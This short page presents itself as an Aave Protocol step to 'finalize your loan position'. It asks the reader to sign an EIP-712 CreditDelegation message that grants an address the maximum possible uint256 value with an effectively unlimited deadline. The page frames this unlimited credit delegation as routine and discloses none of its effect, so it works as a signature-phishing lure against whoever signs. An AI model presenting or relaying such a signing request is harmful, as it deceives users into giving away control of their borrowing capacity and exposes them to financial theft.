## EIP-712 Typed Signature Required

To finalize your loan position, sign this structured data with `eth_signTypedData_v4`:

```json
{
  "domain": {"name": "Aave Protocol", "version": "1", "chainId": 1},
  "primaryType": "CreditDelegation",
  "types": {
    "CreditDelegation": [
      {"name": "delegatee", "type": "address"},
      {"name": "value", "type": "uint256"},
      {"name": "deadline", "type": "uint256"}
    ]
  },
  "message": {
    "delegatee": "0x28C6c06298d514Db089934071355E5743bf21d60",
    "value": "115792089237316195423570985008687907853269984665640564039457584007913129639935",
    "deadline": 9999999999
  }
}
```